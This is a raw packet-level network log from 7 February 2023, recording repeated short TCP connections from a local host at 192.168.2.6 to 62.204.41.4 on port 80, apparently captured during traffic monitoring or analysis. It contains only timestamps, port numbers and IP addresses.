Feb 7, 2023 20:03:51.188824892 CET	50367	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.189821959 CET	50368	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.249316931 CET	80	50367	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.249902010 CET	50367	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.252275944 CET	80	50368	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.252449036 CET	50368	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.253026009 CET	50368	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.315418005 CET	80	50368	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.318506002 CET	80	50368	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.321290016 CET	50368	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.444303036 CET	50368	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.445122004 CET	50369	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.506824017 CET	80	50368	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.507401943 CET	80	50369	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.507611990 CET	50368	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.507653952 CET	50369	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.539851904 CET	50369	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.602339983 CET	80	50369	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.605659962 CET	80	50369	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.609198093 CET	50369	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.736670971 CET	50369	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.738125086 CET	50370	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.799401045 CET	80	50369	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.800584078 CET	80	50370	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.800808907 CET	50369	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.800904989 CET	50370	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.805979013 CET	50370	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.869434118 CET	80	50370	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.872330904 CET	80	50370	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:51.872522116 CET	50370	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.985995054 CET	50370	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:51.987021923 CET	50371	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.047261953 CET	80	50371	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.049635887 CET	80	50370	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.049894094 CET	50370	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.051014900 CET	50371	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.056353092 CET	50371	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.116051912 CET	80	50371	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.119611979 CET	80	50371	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.121170998 CET	50371	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.235728979 CET	50371	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.236740112 CET	50372	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.295542955 CET	80	50371	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.295638084 CET	50371	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.296453953 CET	80	50372	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.296606064 CET	50372	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.297867060 CET	50372	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.357666969 CET	80	50372	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.361998081 CET	80	50372	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.362221956 CET	50372	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.470611095 CET	50372	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.471689939 CET	50373	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.530273914 CET	80	50372	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.530503988 CET	50372	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.532202005 CET	80	50373	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.532357931 CET	50373	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.533128977 CET	50373	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.593669891 CET	80	50373	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.596380949 CET	80	50373	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.596546888 CET	50373	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.706417084 CET	50373	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.707205057 CET	50374	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.767040968 CET	80	50373	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.767215967 CET	50373	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.767474890 CET	80	50374	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.767585039 CET	50374	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.768198967 CET	50374	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.828500986 CET	80	50374	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.831486940 CET	80	50374	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.831578970 CET	50374	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.938285112 CET	50374	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.939225912 CET	50375	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:52.998852968 CET	80	50374	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:52.999100924 CET	50374	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.000555038 CET	80	50375	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.000757933 CET	50375	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.005630016 CET	50375	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.066977978 CET	80	50375	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.074157000 CET	80	50375	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.074364901 CET	50375	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.189500093 CET	50375	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.190613985 CET	50376	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.250873089 CET	80	50375	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.250969887 CET	50375	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.252132893 CET	80	50376	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.252278090 CET	50376	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.252674103 CET	50376	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.314080954 CET	80	50376	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.316498995 CET	80	50376	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.316629887 CET	50376	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.426460028 CET	50376	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.427459002 CET	50377	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.488157988 CET	80	50376	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.488329887 CET	50376	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.488883018 CET	80	50377	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.489087105 CET	50377	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.490588903 CET	50377	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.552467108 CET	80	50377	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.555633068 CET	80	50377	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.555687904 CET	50377	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.677789927 CET	50377	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.678646088 CET	50378	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.739264011 CET	80	50378	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.739314079 CET	80	50377	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.739417076 CET	50378	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.739438057 CET	50377	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.744251966 CET	50378	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.804721117 CET	80	50378	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.806940079 CET	80	50378	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.807085991 CET	50378	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.922271967 CET	50378	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.923095942 CET	50379	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.982842922 CET	80	50378	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.982944965 CET	50378	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.985748053 CET	80	50379	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:53.985972881 CET	50379	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:53.987905025 CET	50379	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.050978899 CET	80	50379	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.054260015 CET	80	50379	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.054380894 CET	50379	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.159575939 CET	50379	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.161658049 CET	50380	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.221482038 CET	80	50380	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.221678019 CET	50380	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.222232103 CET	80	50379	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.222315073 CET	50379	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.222459078 CET	50380	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.281999111 CET	80	50380	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.284440041 CET	80	50380	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.284583092 CET	50380	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.392142057 CET	50380	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.393035889 CET	50381	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.452589035 CET	80	50380	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.452876091 CET	50380	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.456387997 CET	80	50381	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.457629919 CET	50381	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.458167076 CET	50381	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.521136999 CET	80	50381	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.524271011 CET	80	50381	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.526423931 CET	50381	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.643292904 CET	50381	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.644453049 CET	50382	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.706027031 CET	80	50381	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.707182884 CET	80	50382	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.707415104 CET	50381	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.707547903 CET	50382	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.707954884 CET	50382	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.770452976 CET	80	50382	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.772594929 CET	80	50382	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.775443077 CET	50382	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.893578053 CET	50382	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.906116009 CET	50383	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.956257105 CET	80	50382	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.957520008 CET	50382	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.966624975 CET	80	50383	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:54.971538067 CET	50383	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:54.971539021 CET	50383	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.032114983 CET	80	50383	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.034483910 CET	80	50383	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.034733057 CET	50383	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.142873049 CET	50383	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.144553900 CET	50384	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.203375101 CET	80	50383	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.206362009 CET	50383	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.207077026 CET	80	50384	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.207205057 CET	50384	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.223735094 CET	50384	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.286343098 CET	80	50384	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.290314913 CET	80	50384	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.290498972 CET	50384	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.413424015 CET	50384	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.414886951 CET	50385	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.474992990 CET	80	50385	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.475218058 CET	50385	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.476062059 CET	80	50384	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.476171970 CET	50384	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.477920055 CET	50385	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.537595987 CET	80	50385	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.540327072 CET	80	50385	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.540493011 CET	50385	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.659019947 CET	50385	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.659807920 CET	50386	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.718836069 CET	80	50385	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.718967915 CET	50385	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.722424030 CET	80	50386	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.722621918 CET	50386	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.723367929 CET	50386	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.785687923 CET	80	50386	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.788414001 CET	80	50386	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.788542032 CET	50386	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.891377926 CET	50386	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.892419100 CET	50387	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.953949928 CET	80	50386	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.954122066 CET	50386	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.954835892 CET	80	50387	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:55.954979897 CET	50387	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:55.955538034 CET	50387	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.018404961 CET	80	50387	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.021003008 CET	80	50387	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.021138906 CET	50387	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.127132893 CET	50387	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.127923012 CET	50388	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.189178944 CET	80	50388	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.189374924 CET	50388	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.189945936 CET	50388	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.190932989 CET	80	50387	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.191047907 CET	50387	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.250134945 CET	80	50388	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.253367901 CET	80	50388	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.253545046 CET	50388	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.360826015 CET	50388	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.361572981 CET	50389	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.421411037 CET	80	50388	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.421659946 CET	50388	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.422231913 CET	80	50389	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.422393084 CET	50389	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.428558111 CET	50389	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.489407063 CET	80	50389	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.491966963 CET	80	50389	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.492117882 CET	50389	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.612370968 CET	50389	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.614207029 CET	50390	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.673270941 CET	80	50389	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.673358917 CET	50389	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.674556017 CET	80	50390	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.674679041 CET	50390	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.676042080 CET	50390	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.737896919 CET	80	50390	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.739432096 CET	80	50390	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.739502907 CET	50390	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.856657982 CET	50390	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.857485056 CET	50391	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.917285919 CET	80	50390	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.917352915 CET	50390	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.918780088 CET	80	50391	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.918878078 CET	50391	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.919310093 CET	50391	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:56.980706930 CET	80	50391	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.983447075 CET	80	50391	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:56.983618975 CET	50391	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.102355003 CET	50391	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.103173971 CET	50392	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.163887024 CET	80	50391	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.164051056 CET	50391	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.165560961 CET	80	50392	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.165669918 CET	50392	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.167562008 CET	50392	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.230098963 CET	80	50392	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.233685017 CET	80	50392	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.233783007 CET	50392	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.344959021 CET	50392	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.345851898 CET	50393	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.408853054 CET	80	50392	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.408885956 CET	80	50393	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.409032106 CET	50392	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.409105062 CET	50393	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.421089888 CET	50393	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.482760906 CET	80	50393	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.485174894 CET	80	50393	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.485337973 CET	50393	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.596937895 CET	50393	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.597737074 CET	50394	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.658143997 CET	80	50394	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.658519030 CET	80	50393	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.658746958 CET	50393	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.659533978 CET	50394	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.671451092 CET	50394	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.732152939 CET	80	50394	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.734373093 CET	80	50394	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.737847090 CET	50394	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.845823050 CET	50394	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.847948074 CET	50395	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.906392097 CET	80	50394	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.909392118 CET	80	50395	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.909543991 CET	50394	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.909603119 CET	50395	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.910151958 CET	50395	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:57.971784115 CET	80	50395	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.974123001 CET	80	50395	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:57.974323034 CET	50395	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.078655005 CET	50395	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.079564095 CET	50396	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.140466928 CET	80	50395	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.141006947 CET	80	50396	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.141134977 CET	50395	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.141218901 CET	50396	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.143968105 CET	50396	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.205528975 CET	80	50396	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.209055901 CET	80	50396	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.209981918 CET	50396	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.331211090 CET	50396	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.333479881 CET	50397	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.393043041 CET	80	50396	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.393239975 CET	50396	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.393901110 CET	80	50397	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.394051075 CET	50397	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.395000935 CET	50397	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.455471992 CET	80	50397	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.457931995 CET	80	50397	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.458462954 CET	50397	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.563610077 CET	50397	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.564893007 CET	50398	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.626867056 CET	80	50397	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.627073050 CET	50397	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.627137899 CET	80	50398	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.627299070 CET	50398	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.636270046 CET	50398	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.699609041 CET	80	50398	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.701895952 CET	80	50398	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.702116013 CET	50398	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.814193010 CET	50398	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.815282106 CET	50399	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.876259089 CET	80	50399	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.876446009 CET	50399	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.876554012 CET	80	50398	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.876653910 CET	50398	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.878195047 CET	50399	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:58.939063072 CET	80	50399	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.941330910 CET	80	50399	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:58.941478014 CET	50399	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.070036888 CET	50399	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.070718050 CET	50400	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.130856991 CET	80	50399	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.131110907 CET	50399	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.132307053 CET	80	50400	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.132493973 CET	50400	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.133076906 CET	50400	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.194703102 CET	80	50400	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.198379993 CET	80	50400	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.198576927 CET	50400	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.315233946 CET	50400	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.316664934 CET	50401	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.377019882 CET	80	50400	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.377134085 CET	80	50401	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.377230883 CET	50400	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.377321005 CET	50401	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.377763987 CET	50401	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:59.438366890 CET	80	50401	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.441881895 CET	80	50401	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:59.442061901 CET	50401	80	192.168.2.6	62.204.41.4
